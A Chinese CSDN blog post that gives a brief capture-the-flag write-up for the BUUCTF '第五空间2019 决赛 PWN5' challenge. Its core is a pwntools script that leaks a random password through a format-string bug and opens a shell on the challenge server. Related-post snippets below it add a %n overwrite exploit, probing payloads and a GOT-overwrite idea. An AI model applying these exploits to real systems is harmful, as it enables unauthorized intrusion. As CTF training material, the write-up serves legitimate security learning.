[第五空间2019 决赛]PWN5比较另类的解法

最新推荐文章于 2024-04-01 09:29:25 发布
最新推荐文章于 2024-04-01 09:29:25 发布
阅读量207 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43766802/article/details/108852533
版权

格式化字符串漏洞 内存泄露 getshell pwn 远程服务器
关键词由CSDN通过智能技术生成

利用格式化字符串漏洞泄漏nptr的随机数,再输入

getshell

wp

from pwn import *
context.log_level='debug'
io=remote("node3.buuoj.cn",26613)
buf=0x0804c044
password=""
payload=p32(buf)+b'%10$s'
io.recv()
io.sendline(payload)
io.recvuntil("Hello,D"+'\xc0\x04\x08')
password=u32(io.recv(4))
io.sendline(str(password))
io.interactive()

 

小子不要笑
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[第五空间2019 决赛]PWN5
m0_52231248的博客
11-02 95
[第五空间2019 决赛]PWN5 题目Ubuntu16,libc2.23 Checksec检查发现开启了canary和nx 进入main函数发现gets函数存在格式化字符串漏洞 并且程序会检查我们输入的password是否等于unk_804C044这个随机数,成功会直接给我们调用system(“/bin/sh”),因此我们检查unk_804C044位置发现位于bss段 接下来只要确认我们输入的数据到unk_804C044的偏移即可修改unk_804C044。 可以通过.%p或者gd
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 418
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2233
通过PWN5一题尝试理解格式化字符串漏洞。
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 638
简单易懂~
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1416
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
【Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
【Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4429
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2564
[第五空间2019 决赛]PWN5 ——两种解法
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 344
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 796
BUUCTF--pwn--[第五空间2019 决赛]PWN5
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 586
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值